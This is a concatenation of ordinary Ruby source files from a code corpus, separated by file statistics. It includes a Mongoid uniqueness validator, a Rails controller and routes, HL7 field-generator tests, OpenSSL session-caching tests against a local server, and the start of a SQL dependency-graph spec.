criteria = scope(base.unscoped, document, attribute)
criteria.selector.update(criterion(document, attribute, value.mongoize))
criteria
end
# Get the default criteria for checking uniqueness.
#
# @api private
#
# @example Get the criteria.
# validator.criterion(person, :title, "Sir")
#
# @param [ Document ] document The document to validate.
# @param [ Symbol ] attribute The name of the attribute.
# @param [ Object ] value The value of the object.
#
# @return [ Criteria ] The uniqueness criteria.
#
# @since 2.3.0
def criterion(document, attribute, value)
field = document.database_field_name(attribute)
if value && localized?(document, field)
conditions = (value || {}).inject([]) { |acc, (k,v)| acc << { "#{field}.#{k}" => filter(v) }}
selector = { "$or" => conditions }
else
selector = { field => filter(value) }
end
if document.persisted? && !document.embedded?
selector.merge!(_id: { "$ne" => document._id })
end
selector
end
# Filter the value based on whether the check is case sensitive or not.
#
# @api private
#
# @example Filter the value.
# validator.filter("testing")
#
# @param [ Object ] value The value to filter.
#
# @return [ Object, Regexp ] The value, filtered or not.
#
# @since 2.3.0
def filter(value)
!case_sensitive? && value ? /\A#{Regexp.escape(value.to_s)}$/i : value
end
# Scope the criteria to the scope options provided.
#
# @api private
#
# @example Scope the criteria.
# validator.scope(criteria, document)
#
# @param [ Criteria ] criteria The criteria to scope.
# @param [ Document ] document The document being validated.
#
# @return [ Criteria ] The scoped criteria.
#
# @since 2.3.0
def scope(criteria, document, _attribute)
Array.wrap(options[:scope]).each do |item|
name = document.database_field_name(item)
criteria = criteria.where(item => document.attributes[name])
end
criteria
end
# Should validation be skipped?
#
# @api private
#
# @example Should the validation be skipped?
# validator.skip_validation?(doc)
#
# @param [ Document ] document The embedded document.
#
# @return [ true, false ] If the validation should be skipped.
#
# @since 2.3.0
def skip_validation?(document)
!document._parent || document.embedded_one?
end
# Scope reference has changed?
#
# @api private
#
# @example Has scope reference changed?
# validator.scope_value_changed?(doc)
#
# @param [ Document ] document The embedded document.
#
# @return [ true, false ] If the scope reference has changed.
#
# @since
def scope_value_changed?(document)
Array.wrap(options[:scope]).any? do |item|
document.send("attribute_changed?", item.to_s)
end
end
# Get the name of the field and the value to validate. This is for the
# case when we validate a relation via the relation name and not the key,
# we need to send the key name and value to the db, not the relation
# object.
#
# @api private
#
# @example Get the name and key to validate.
# validator.to_validate(doc, :parent, Parent.new)
#
# @param [ Document ] document The doc getting validated.
# @param [ Symbol ] attribute The attribute getting validated.
# @param [ Object ] value The value of the attribute.
#
# @return [ Array<Object, Object> ] The field and value.
#
# @since 2.4.4
def to_validate(document, attribute, value)
association = document.relations[attribute.to_s]
if association && association.stores_foreign_key?
[ association.foreign_key, value && value._id ]
else
[ attribute, value ]
end
end
# Validate an embedded document.
#
# @api private
#
# @example Validate the embedded document.
# validator.validate_embedded(doc, :name, "test")
#
# @param [ Document ] document The document.
# @param [ Symbol ] attribute The attribute name.
# @param [ Object ] value The value.
#
# @since 2.4.10
def validate_embedded(document, attribute, value)
return if skip_validation?(document)
relation = document._parent.send(document.association_name)
criteria = create_criteria(relation, document, attribute, value)
criteria = criteria.merge(options[:conditions].call) if options[:conditions]
add_error(document, attribute, value) if criteria.count > 1
end
# Validate a root document.
#
# @api private
#
# @example Validate the root document.
# validator.validate_root(doc, :name, "test")
#
# @param [ Document ] document The document.
# @param [ Symbol ] attribute The attribute name.
# @param [ Object ] value The value.
#
# @since 2.4.10
def validate_root(document, attribute, value)
klass = document.class
while klass.superclass.respond_to?(:validators) && klass.superclass.validators.include?(self)
klass = klass.superclass
end
criteria = create_criteria(klass, document, attribute, value)
criteria = criteria.merge(options[:conditions].call) if options[:conditions]
if criteria.read(mode: :primary).exists?
add_error(document, attribute, value)
end
end
# Are we required to validate the document?
#
# @example Is validation needed?
# validator.validation_required?(doc, :field)
#
# @param [ Document ] document The document getting validated.
# @param [ Symbol ] attribute The attribute to validate.
#
# @return [ true, false ] If we need to validate.
#
# @since 2.4.4
def validation_required?(document, attribute)
document.new_record? ||
document.send("attribute_changed?", attribute.to_s) ||
scope_value_changed?(document)
end
# Is the attribute localized?
#
# @api private
#
# @example Is the attribute localized?
# validator.localized?(doc, :field)
#
# @param [ Document ] document The document getting validated.
# @param [ Symbol ] attribute The attribute to validate.
#
# @return [ true, false ] If the attribute is localized.
#
# @since 4.0.0
def localized?(document, attribute)
document.fields[document.database_field_name(attribute)].try(:localized?)
end
end
end
end
| 31.933962 | 103 | 0.593895 |
280036f9057beecc97706606d1288e7bf63756a4 | 263 | Rails.application.routes.draw do
resources :todos
get 'hello_world', to: 'hello_world#index'
put '/todos', to: 'todos#massUpdate'
root 'todos#index'
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
end
| 32.875 | 101 | 0.741445 |
6a6a109dbbe8386cd230301fa0ff5b294f78d7b6 | 1,230 | class ExercisesController < ApplicationController
before_action :set_exercise, only: [:show, :update, :destroy]
# GET /exercises
def index
@exercises = Exercise.all
render json: ExerciseSerializer.new(@exercises).serializable_hash[:data].map{|hash| hash[:attributes] }
end
# GET /exercises/1
def show
render json: @exercise
end
# POST /exercises
def create
@exercise = Exercise.new(exercise_params)
if @exercise.save
render json: @exercise, status: :created, location: @exercise
else
render json: @exercise.errors, status: :unprocessable_entity
end
end
# PATCH/PUT /exercises/1
def update
if @exercise.update(exercise_params)
render json: @exercise
else
render json: @exercise.errors, status: :unprocessable_entity
end
end
# DELETE /exercises/1
def destroy
@exercise.destroy
end
private
# Use callbacks to share common setup or constraints between actions.
def set_exercise
@exercise = Exercise.find(params[:id])
end
# Only allow a trusted parameter "white list" through.
def exercise_params
params.require(:exercise).permit(:name, :category, :target, :user_id, :workout_id)
end
end
| 23.653846 | 107 | 0.692683 |
e9971a0d18dd0e81f4f63828335ce2c69abc531e | 8,949 | require 'test/unit'
require 'ox'
require 'set'
require_relative '../../lib/ez7gen/service/2.5/field_generator'
class FieldGenerator25Test < Test::Unit::TestCase
# 27
vs =
[
# {:std=>"2.4", :path=>"../../test/test-config/schema/2.4", :profiles=>[{:doc=>"2.4.HL7", :name=>"2.4", :std=>"1", :path=>"../test/test-config/schema/2.4/2.4.HL7.xml"}, {:doc=>"VAZ2.4.HL7", :name=>"VAZ2.4", :description=>"2.4 schema with VA defined tables and Z segments", :base=>"2.4", :path=>"../test/test-config/schema/2.4/VAZ2.4.HL7.xml.bkp"}]},
{:std=>"2.5", :path=>"../../test/test-config/schema/2.5", :profiles=>[{:doc=>"2.5.HL7", :name=>"2.5", :std=>"1", :path=>"../../test/test-config/schema/2.5/2.5.HL7.xml"}, {:doc=>"TEST2.5.HL7", :name=>"TEST2.5", :description=>"2.5 mockup schema for testing", :base=>"2.5", :path=>"../../test/test-config/schema/2.5/VAZ2.5.HL7.xml"}]}
]
# attrs = {std: '2.4', version: '2.4.HL7', event: 'ADT_A01', version_store: vs}
attrs = {std: '2.5', version: '2.5.HL7', event: 'ADT_A01', version_store: vs}
#parse xml once
@@pp = ProfileParser.new(attrs)
#helper: turns a "[k1: v1, k2: v2]" line into a symbol-keyed hash
def lineToHash(line)
hash = line.gsub(/(\[|\])/,'').gsub(':',',').split(',').map{|it| it.strip()}.each_slice(2).to_a.to_h
return Hash[hash.map{|(k,v)| [k.to_sym,v]}]
end
def setup
@fldGenerator = FieldGenerator.new(@@pp)
end
def teardown
@fieldGenerator = nil
end
def test_init
assert_equal 'Odysseus', @fldGenerator.yml['person.names.first'][0]
end
def test_base_types
dt = @fldGenerator.DT({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.FT({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.ID({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.IS({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.NM({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.SI({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.ST({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.TM({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.TN({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.TX({},true)
p dt
assert_not_nil dt
end
def test_property_types
dt = @fldGenerator.FN({},true)
p dt
assert_not_nil dt
end
# <DataType name='FN' description='familiy name'>
# <DataSubType piece='1' description='surname' datatype='ST' />
# <DataSubType piece='2' description='own surname prefix' datatype='ST' />
# <DataSubType piece='3' description='own surname' datatype='ST' />
# <DataSubType piece='4' description='surname prefix from partner/spouse' datatype='ST' />
# <DataSubType piece='5' description='surname from partner/spouse' datatype='ST' />
# </DataType>
def test_dynamic_SN
#2.4
# <DataType name='SN' description='structured numeric'>
# <DataSubType piece='1' description='comparator'datatype='ST' />
# <DataSubType piece='2' description='num1' datatype='NM' />
# <DataSubType piece='3' description='separator/suffix' datatype='ST' />
# <DataSubType piece='4' description='num2' datatype='NM' />
# </DataType>
#2.5
# <DataType name='SN' description='Structured Numeric'>
# <DataSubType piece='1' description='Comparator' datatype='ST' max_length='2' required='O'/>
# <DataSubType piece='2' description='Num1' datatype='NM' max_length='15' required='O'/>
# <DataSubType piece='3' description='Separator/Suffix' datatype='ST' max_length='1' required='O'/>
# <DataSubType piece='4' description='Num2' datatype='NM' max_length='15' required='O'/>
# </DataType>
dt = @fldGenerator.dt('SN',{:required => 'R'})
p dt
assert_equal 3, dt.count('^')
end
def test_dynamic_CE
# <DataType name='CE' description='coded element'>
# <DataSubType piece='1' description='identifier (ST)' datatype='ST' />
# <DataSubType piece='2' description='text' datatype='ST' />
# <DataSubType piece='3' description='name of coding system' datatype='IS' codetable='396' />
# <DataSubType piece='4' description='alternate identifier (ST)' datatype='ST' />
# <DataSubType piece='5' description='alternate text' datatype='ST' />
# <DataSubType piece='6' description='name of alternate coding system' datatype='IS' codetable='396' />
# </DataType>
dt = @fldGenerator.dt('CE',{:required => 'R'})
p dt
# assert_equal 5, dt.count('^')
assert_equal 0, dt.count('^')
end
def test_dynamic_XPN
# <DataType name='XPN' description='Extended Person Name'>
# <DataSubType piece='1' description='Family Name' datatype='FN' max_length='194' required='O'/>
# <DataSubType piece='2' description='Given Name' datatype='ST' max_length='30' required='O'/>
# <DataSubType piece='3' description='Second and Further Given Names or Initials Thereof' datatype='ST' max_length='30' required='O'/>
# <DataSubType piece='4' description='Suffix (e.g., JR or III)' datatype='ST' max_length='20' required='O'/>
# <DataSubType piece='5' description='Prefix (e.g., DR)' datatype='ST' max_length='20' required='O'/>
# <DataSubType piece='6' description='Degree (e.g., MD)' datatype='IS' codetable='360' max_length='6' required='B'/>
# <DataSubType piece='7' description='Name Type Code' datatype='ID' codetable='200' max_length='1' required='O'/>
# <DataSubType piece='8' description='Name Representation Code' datatype='ID' codetable='465' max_length='1' required='O'/>
# <DataSubType piece='9' description='Name Context' datatype='CE' codetable='448' max_length='483' required='O'/>
# <DataSubType piece='10' description='Name Validity Range' datatype='DR' max_length='53' required='B'/>
# <DataSubType piece='11' description='Name Assembly Order' datatype='ID' codetable='444' max_length='1' required='O'/>
# <DataSubType piece='12' description='Effective Date' datatype='TS' max_length='26' required='O'/>
# <DataSubType piece='13' description='Expiration Date' datatype='TS' max_length='26' required='O'/>
# <DataSubType piece='14' description='Professional Suffix' datatype='ST' max_length='199' required='O'/>
# </DataType>
dt = @fldGenerator.dt('XPN',{:required => 'R'})
p dt
end
def test_dynamic_AD
# <DataType name='AD' description='Address'>
# <DataSubType piece='1' description='Street Address' max_length='120' required='O'/>
# <DataSubType piece='2' description='Other Designation' datatype='ST' max_length='120' required='O'/>
# <DataSubType piece='3' description='City' datatype='ST' max_length='50' required='O'/>
# <DataSubType piece='4' description='State or Province' datatype='ST' max_length='50' required='O'/>
# <DataSubType piece='5' description='Zip or Postal Code' datatype='ST' max_length='12' required='O'/>
# <DataSubType piece='6' description='Country' datatype='ID' codetable='399' max_length='3' required='O'/>
# <DataSubType piece='7' description='Address Type' datatype='ID' codetable='190' max_length='3' required='O'/>
# <DataSubType piece='8' description='Other Geographic Designation' datatype='ST' max_length='50' required='O'/>
# </DataType>
dt = @fldGenerator.dt('AD',{:required => 'R'})
p dt
end
def test_TS
p @fldGenerator.dt('TS',{:required => 'R', :max_length=> 50})
end
def test_HD
# <DataType name='HD' description='Hierarchic Designator'>
# <DataSubType piece='1' description='Namespace ID' datatype='IS' codetable='300' max_length='20' required='O'/>
# <DataSubType piece='2' description='Universal ID' datatype='ST' max_length='199' required='C'/>
# <DataSubType piece='3' description='Universal ID Type' datatype='ID' codetable='301' max_length='6' required='C'/>
# </DataType>
p @fldGenerator.dt('HD',{:required => 'R'})
end
def test_ED
# <DataType name='ED' description='Encapsulated Data'>
# <DataSubType piece='1' description='Source Application' datatype='HD' max_length='227' required='O'/>
# <DataSubType piece='2' description='Type of Data' datatype='ID' codetable='191' max_length='9' required='R'/>
# <DataSubType piece='3' description='Data Subtype' datatype='ID' codetable='291' max_length='18' required='O'/>
# <DataSubType piece='4' description='Encoding' datatype='ID' codetable='299' max_length='6' required='R'/>
# <DataSubType piece='5' description='Data' datatype='TX' required='R'/>
# </DataType>
p @fldGenerator.dt('ED',{:required => 'R'})
end
def test_all
all = []
path = File.path('../../test/test-config/schema/2.5/2.5.HL7.xml')
xml = Ox.parse(IO.read(path))
assert_not_nil (xml)
data_types = []
dts = xml.Export.Document.Category.locate('DataType')
dts.each{ |it|
name =it.attributes[:name]
all << name
# p "DataType: #{name}"
dt = @fldGenerator.dt(name,{:required => 'R'})
p "DataType #{name} :" + dt
}
p all
p all.size
end
end | 41.050459 | 359 | 0.649123 |
f89732ab6c0006cdea4a6bc878d919503c30d058 | 13,088 | # frozen_string_literal: false
require_relative "utils"
class OpenSSL::TestSSLSession < OpenSSL::SSLTestCase
def test_session_equals
session = OpenSSL::SSL::Session.new <<-SESSION
-----BEGIN SSL SESSION PARAMETERS-----
MIIDFgIBAQICAwEEAgA5BCCY3pW6iTkPoD5SENuztz/gZjhvey6XnHbsxd22k0Ol
dgQw8uaN3hCRnlhoIKPWInCFzrp/tQsDRFs9jDjc9pwpy/oKHmJdQQMQA1g8FYnO
gpdVoQYCBE52ikKiBAICASyjggKOMIICijCCAXKgAwIBAgIBAjANBgkqhkiG9w0B
AQUFADA9MRMwEQYKCZImiZPyLGQBGRYDb3JnMRkwFwYKCZImiZPyLGQBGRYJcnVi
eS1sYW5nMQswCQYDVQQDDAJDQTAeFw0xMTA5MTkwMDE4MTBaFw0xMTA5MTkwMDQ4
MTBaMEQxEzARBgoJkiaJk/IsZAEZFgNvcmcxGTAXBgoJkiaJk/IsZAEZFglydWJ5
LWxhbmcxEjAQBgNVBAMMCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAw
gYkCgYEAy8LEsNRApz7U/j5DoB4XBgO9Z8Atv5y/OVQRp0ag8Tqo1YewsWijxEWB
7JOATwpBN267U4T1nPZIxxEEO7n/WNa2ws9JWsjah8ssEBFSxZqdXKSLf0N4Hi7/
GQ/aYoaMCiQ8jA4jegK2FJmXM71uPe+jFN/peeBOpRfyXxRFOYcCAwEAAaMSMBAw
DgYDVR0PAQH/BAQDAgWgMA0GCSqGSIb3DQEBBQUAA4IBAQARC7GP7InX1t7VEXz2
I8RI57S0/HSJL4fDIYP3zFpitHX1PZeo+7XuzMilvPjjBo/ky9Jzo8TYiY+N+JEz
mY/A/zPA4ZsJ7KYj6/FEdIc/vRlS0CvsbClbNjw1jl/PoB2FLr2b3uuBcZEsyZeP
yq154ijq37Ajf8K5Mi5FgshoP41BPtRPj+VVf61rv1IcEnNWdDCS6DR4XsaNC+zt
G6AqCqkytIXWRuDw6n6vYLF3A/tn2sldLo7/scY0PMDNbo63O/LTxkDHmPhSkD68
8m9SsMeTR+RCiDEZWFPVcAH/8mDfi+5k8uN3qS+gOU/PPrmHGgl5ykiSFgqs4v61
tddwpBAEDjcwMzA5NTYzMTU1MzAwpQMCARM=
-----END SSL SESSION PARAMETERS-----
SESSION
start_server(ignore_listener_error: true) { |_, port|
ctx = OpenSSL::SSL::SSLContext.new
ctx.session_cache_mode = OpenSSL::SSL::SSLContext::SESSION_CACHE_CLIENT
ctx.session_id_context = self.object_id.to_s
sock = TCPSocket.new '127.0.0.1', port
begin
ssl = OpenSSL::SSL::SSLSocket.new sock, ctx
ssl.session = session
assert_equal session, ssl.session
ensure
sock.close
end
}
end
def test_session
Timeout.timeout(5) do
start_server do |server, port|
sock = TCPSocket.new("127.0.0.1", port)
ctx = OpenSSL::SSL::SSLContext.new
ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
ssl.sync_close = true
ssl.connect
session = ssl.session
assert(session == OpenSSL::SSL::Session.new(session.to_pem))
assert(session == OpenSSL::SSL::Session.new(ssl))
session.timeout = 5
assert_equal(5, session.timeout)
assert_not_nil(session.time)
# SSL_SESSION_time keeps long value so we can't keep nsec fragment.
session.time = t1 = Time.now.to_i
assert_equal(Time.at(t1), session.time)
assert_not_nil(session.id)
pem = session.to_pem
assert_match(/\A-----BEGIN SSL SESSION PARAMETERS-----/, pem)
assert_match(/-----END SSL SESSION PARAMETERS-----\Z/, pem)
pem.gsub!(/-----(BEGIN|END) SSL SESSION PARAMETERS-----/, '').gsub!(/[\r\n]+/m, '')
assert_equal(session.to_der, pem.unpack('m*')[0])
assert_not_nil(session.to_text)
ssl.close
end
end
end
DUMMY_SESSION = <<__EOS__
-----BEGIN SSL SESSION PARAMETERS-----
MIIDzQIBAQICAwEEAgA5BCAF219w9ZEV8dNA60cpEGOI34hJtIFbf3bkfzSgMyad
MQQwyGLbkCxE4OiMLdKKem+pyh8V7ifoP7tCxhdmwoDlJxI1v6nVCjai+FGYuncy
NNSWoQYCBE4DDWuiAwIBCqOCAo4wggKKMIIBcqADAgECAgECMA0GCSqGSIb3DQEB
BQUAMD0xEzARBgoJkiaJk/IsZAEZFgNvcmcxGTAXBgoJkiaJk/IsZAEZFglydWJ5
LWxhbmcxCzAJBgNVBAMMAkNBMB4XDTExMDYyMzA5NTQ1MVoXDTExMDYyMzEwMjQ1
MVowRDETMBEGCgmSJomT8ixkARkWA29yZzEZMBcGCgmSJomT8ixkARkWCXJ1Ynkt
bGFuZzESMBAGA1UEAwwJbG9jYWxob3N0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
iQKBgQDLwsSw1ECnPtT+PkOgHhcGA71nwC2/nL85VBGnRqDxOqjVh7CxaKPERYHs
k4BPCkE3brtThPWc9kjHEQQ7uf9Y1rbCz0layNqHyywQEVLFmp1cpIt/Q3geLv8Z
D9pihowKJDyMDiN6ArYUmZczvW4976MU3+l54E6lF/JfFEU5hwIDAQABoxIwEDAO
BgNVHQ8BAf8EBAMCBaAwDQYJKoZIhvcNAQEFBQADggEBACj5WhoZ/ODVeHpwgq1d
8fW/13ICRYHYpv6dzlWihyqclGxbKMlMnaVCPz+4JaVtMz3QB748KJQgL3Llg3R1
ek+f+n1MBCMfFFsQXJ2gtLB84zD6UCz8aaCWN5/czJCd7xMz7fRLy3TOIW5boXAU
zIa8EODk+477K1uznHm286ab0Clv+9d304hwmBZgkzLg6+31Of6d6s0E0rwLGiS2
sOWYg34Y3r4j8BS9Ak4jzpoLY6cJ0QAKCOJCgmjGr4XHpyXMLbicp3ga1uSbwtVO
gF/gTfpLhJC+y0EQ5x3Ftl88Cq7ZJuLBDMo/TLIfReJMQu/HlrTT7+LwtneSWGmr
KkSkAgQApQMCAROqgcMEgcAuDkAVfj6QAJMz9yqTzW5wPFyty7CxUEcwKjUqj5UP
/Yvky1EkRuM/eQfN7ucY+MUvMqv+R8ZSkHPsnjkBN5ChvZXjrUSZKFVjR4eFVz2V
jismLEJvIFhQh6pqTroRrOjMfTaM5Lwoytr2FTGobN9rnjIRsXeFQW1HLFbXn7Dh
8uaQkMwIVVSGRB8T7t6z6WIdWruOjCZ6G5ASI5XoqAHwGezhLodZuvJEfsVyCF9y
j+RBGfCFrrQbBdnkFI/ztgM=
-----END SSL SESSION PARAMETERS-----
__EOS__
DUMMY_SESSION_NO_EXT = <<-__EOS__
-----BEGIN SSL SESSION PARAMETERS-----
MIIDCAIBAQICAwAEAgA5BCDyAW7rcpzMjDSosH+Tv6sukymeqgq3xQVVMez628A+
lAQw9TrKzrIqlHEh6ltuQaqv/Aq83AmaAlogYktZgXAjOGnhX7ifJDNLMuCfQq53
hPAaoQYCBE4iDeeiBAICASyjggKOMIICijCCAXKgAwIBAgIBAjANBgkqhkiG9w0B
AQUFADA9MRMwEQYKCZImiZPyLGQBGRYDb3JnMRkwFwYKCZImiZPyLGQBGRYJcnVi
eS1sYW5nMQswCQYDVQQDDAJDQTAeFw0xMTA3MTYyMjE3MTFaFw0xMTA3MTYyMjQ3
MTFaMEQxEzARBgoJkiaJk/IsZAEZFgNvcmcxGTAXBgoJkiaJk/IsZAEZFglydWJ5
LWxhbmcxEjAQBgNVBAMMCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAw
gYkCgYEAy8LEsNRApz7U/j5DoB4XBgO9Z8Atv5y/OVQRp0ag8Tqo1YewsWijxEWB
7JOATwpBN267U4T1nPZIxxEEO7n/WNa2ws9JWsjah8ssEBFSxZqdXKSLf0N4Hi7/
GQ/aYoaMCiQ8jA4jegK2FJmXM71uPe+jFN/peeBOpRfyXxRFOYcCAwEAAaMSMBAw
DgYDVR0PAQH/BAQDAgWgMA0GCSqGSIb3DQEBBQUAA4IBAQA3TRzABRG3kz8jEEYr
tDQqXgsxwTsLhTT5d1yF0D8uFw+y15hJAJnh6GJHjqhWBrF4zNoTApFo+4iIL6g3
q9C3mUsxIVAHx41DwZBh/FI7J4FqlAoGOguu7892CNVY3ZZjc3AXMTdKjcNoWPzz
FCdj5fNT24JMMe+ZdGZK97ChahJsdn/6B3j6ze9NK9mfYEbiJhejGTPLOFVHJCGR
KYYZ3ZcKhLDr9ql4d7cCo1gBtemrmFQGPui7GttNEqmXqUKvV8mYoa8farf5i7T4
L6a/gp2cVZTaDIS1HjbJsA/Ag7AajZqiN6LfqShNUVsrMZ+5CoV8EkBDTZPJ9MSr
a3EqpAIEAKUDAgET
-----END SSL SESSION PARAMETERS-----
__EOS__
def test_session_time
sess = OpenSSL::SSL::Session.new(DUMMY_SESSION_NO_EXT)
sess.time = (now = Time.now)
assert_equal(now.to_i, sess.time.to_i)
sess.time = 1
assert_equal(1, sess.time.to_i)
sess.time = 1.2345
assert_equal(1, sess.time.to_i)
# Can OpenSSL handle t>2038y correctly? Version?
sess.time = 2**31 - 1
assert_equal(2**31 - 1, sess.time.to_i)
end
def test_session_timeout
sess = OpenSSL::SSL::Session.new(DUMMY_SESSION_NO_EXT)
assert_raise(TypeError) do
sess.timeout = Time.now
end
sess.timeout = 1
assert_equal(1, sess.timeout.to_i)
sess.timeout = 1.2345
assert_equal(1, sess.timeout.to_i)
sess.timeout = 2**31 - 1
assert_equal(2**31 - 1, sess.timeout.to_i)
end
def test_session_exts_read
assert(OpenSSL::SSL::Session.new(DUMMY_SESSION))
end
def test_client_session
last_session = nil
start_server do |server, port|
2.times do
sock = TCPSocket.new("127.0.0.1", port)
ctx = OpenSSL::SSL::SSLContext.new
ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
ssl.sync_close = true
ssl.session = last_session if last_session
ssl.connect
session = ssl.session
if last_session
assert(ssl.session_reused?)
assert_equal(session.id, last_session.id)
assert_equal(session.to_pem, last_session.to_pem)
assert_equal(session.to_der, last_session.to_der)
# Older version of OpenSSL may not be consistent. Look up which versions later.
assert_equal(session.to_text, last_session.to_text)
else
assert(!ssl.session_reused?)
end
last_session = session
str = "x" * 100 + "\n"
ssl.puts(str)
assert_equal(str, ssl.gets)
ssl.close
end
end
end
def test_server_session
connections = 0
saved_session = nil
ctx_proc = Proc.new do |ctx, ssl|
# add test for session callbacks here
end
server_proc = Proc.new do |ctx, ssl|
session = ssl.session
stats = ctx.session_cache_stats
case connections
when 0
assert_equal(stats[:cache_num], 1)
assert_equal(stats[:cache_hits], 0)
assert_equal(stats[:cache_misses], 0)
assert(!ssl.session_reused?)
when 1
assert_equal(stats[:cache_num], 1)
assert_equal(stats[:cache_hits], 1)
assert_equal(stats[:cache_misses], 0)
assert(ssl.session_reused?)
ctx.session_remove(session)
saved_session = session.to_der
when 2
assert_equal(stats[:cache_num], 1)
assert_equal(stats[:cache_hits], 1)
assert_equal(stats[:cache_misses], 1)
assert(!ssl.session_reused?)
ctx.session_add(OpenSSL::SSL::Session.new(saved_session))
when 3
assert_equal(stats[:cache_num], 2)
assert_equal(stats[:cache_hits], 2)
assert_equal(stats[:cache_misses], 1)
assert(ssl.session_reused?)
ctx.flush_sessions(Time.now + 10000)
when 4
assert_equal(stats[:cache_num], 1)
assert_equal(stats[:cache_hits], 2)
assert_equal(stats[:cache_misses], 2)
assert(!ssl.session_reused?)
ctx.session_add(OpenSSL::SSL::Session.new(saved_session))
end
connections += 1
readwrite_loop(ctx, ssl)
end
first_session = nil
start_server(ctx_proc: ctx_proc, server_proc: server_proc) do |server, port|
10.times do |i|
sock = TCPSocket.new("127.0.0.1", port)
ctx = OpenSSL::SSL::SSLContext.new
# disable RFC4507 support
ctx.options = OpenSSL::SSL::OP_NO_TICKET
ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
ssl.sync_close = true
ssl.session = first_session if first_session
ssl.connect
session = ssl.session
if first_session
case i
when 1; assert(ssl.session_reused?)
when 2; assert(!ssl.session_reused?)
when 3; assert(ssl.session_reused?)
when 4; assert(!ssl.session_reused?)
when 5..10; assert(ssl.session_reused?)
end
end
first_session ||= session
str = "x" * 100 + "\n"
ssl.puts(str)
assert_equal(str, ssl.gets)
ssl.close
end
end
end
def test_ctx_client_session_cb
called = {}
ctx = OpenSSL::SSL::SSLContext.new
ctx.session_cache_mode = OpenSSL::SSL::SSLContext::SESSION_CACHE_CLIENT
ctx.session_new_cb = lambda { |ary|
sock, sess = ary
called[:new] = [sock, sess]
}
ctx.session_remove_cb = lambda { |ary|
ctx, sess = ary
called[:remove] = [ctx, sess]
# any resulting value is OK (ignored)
}
start_server do |server, port|
sock = TCPSocket.new("127.0.0.1", port)
begin
ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
ssl.sync_close = true
ssl.connect
assert_equal(1, ctx.session_cache_stats[:cache_num])
assert_equal(1, ctx.session_cache_stats[:connect_good])
assert_equal([ssl, ssl.session], called[:new])
assert(ctx.session_remove(ssl.session))
assert(!ctx.session_remove(ssl.session))
assert_equal([ctx, ssl.session], called[:remove])
ssl.close
ensure
sock.close if !sock.closed?
end
end
end
def test_ctx_server_session_cb
called = {}
ctx_proc = Proc.new { |ctx, ssl|
ctx.session_cache_mode = OpenSSL::SSL::SSLContext::SESSION_CACHE_SERVER
ctx.options = OpenSSL::SSL::OP_NO_TICKET
last_server_session = nil
# get_cb is called whenever a client proposed to resume a session but
# the session could not be found in the internal session cache.
ctx.session_get_cb = lambda { |ary|
sess, data = ary
if last_server_session
called[:get2] = [sess, data]
last_server_session
else
called[:get1] = [sess, data]
last_server_session = sess
nil
end
}
ctx.session_new_cb = lambda { |ary|
sock, sess = ary
called[:new] = [sock, sess]
# SSL server doesn't cache sessions so get_cb is called next time.
ctx.session_remove(sess)
}
ctx.session_remove_cb = lambda { |ary|
ctx, sess = ary
called[:remove] = [ctx, sess]
}
}
server_proc = Proc.new { |c, ssl|
ssl.session
c.session_cache_stats
readwrite_loop(c, ssl)
}
start_server(ctx_proc: ctx_proc, server_proc: server_proc) do |server, port|
last_client_session = nil
3.times do
sock = TCPSocket.new("127.0.0.1", port)
begin
ssl = OpenSSL::SSL::SSLSocket.new(sock, OpenSSL::SSL::SSLContext.new())
ssl.sync_close = true
ssl.session = last_client_session if last_client_session
ssl.connect
last_client_session = ssl.session
ssl.close
Timeout.timeout(5) do
Thread.pass until called.key?(:new)
assert(called.delete(:new))
Thread.pass until called.key?(:remove)
assert(called.delete(:remove))
end
ensure
sock.close if !sock.closed?
end
end
end
assert(called[:get1])
assert(called[:get2])
end
def test_dup
sess_orig = OpenSSL::SSL::Session.new(DUMMY_SESSION)
sess_dup = sess_orig.dup
assert_equal(sess_orig.to_der, sess_dup.to_der)
end
end
| 34.901333 | 91 | 0.709658 |
268f3b717170ea5124bff77fdb45b42e43490b52 | 624 | # frozen_string_literal: true
module QA
module Page
module Trials
class New < Chemlab::Page
path '/-/trials/new'
# TODO: Supplant with data-qa-selectors
text_field :first_name, id: 'first_name'
text_field :last_name, id: 'last_name'
text_field :company_name, id: 'company_name'
select :number_of_employees, id: 'company_size'
text_field :telephone_number, id: 'phone_number'
text_field :number_of_users, id: 'number_of_users'
select :country, id: 'country_select'
button :continue, value: 'Continue'
end
end
end
end
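# Editorial usage sketch (not in the source): Chemlab generates element
# accessors from the declarations above, so a test could fill the trial form
# roughly as follows. The accessor names are assumptions about Chemlab's
# generated methods, and the values are made up.
#
#   page = QA::Page::Trials::New.new
#   page.first_name = 'Ada'
#   page.last_name = 'Lovelace'
#   page.company_name = 'Example Ltd'
#   page.continue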
| 26 | 58 | 0.649038 |
39dfcd94ee0dfb28770ed687886b99a140b3d4f4 | 1,585 | require 'dbcode/graph'
require 'dbcode/sql_file'
describe DBCode::Graph do
def file_double(methods)
double DBCode::SQLFile, methods
end
it 'sorts two interdependent files' do
file_1 = file_double name: 'file_1', dependency_names: ['file_2'], to_sql: 'file 1'
file_2 = file_double name: 'file_2', dependency_names: [], to_sql: 'file 2'
expect(described_class.new([file_1,file_2]).compile).to eq "file 2;\nfile 1"
end
it 'resolves a triangle' do
file_1 = file_double name: 'file_1', dependency_names: ['file_2'], to_sql: 'file 1'
file_2 = file_double name: 'file_2', dependency_names: [], to_sql: 'file 2'
file_3 = file_double name: 'file_3', dependency_names: ['file_2'], to_sql: 'file 3'
expect(described_class.new([file_1,file_2,file_3]).compile).to eq "file 2;\nfile 1;\nfile 3"
end
it 'resolves a chain of three' do
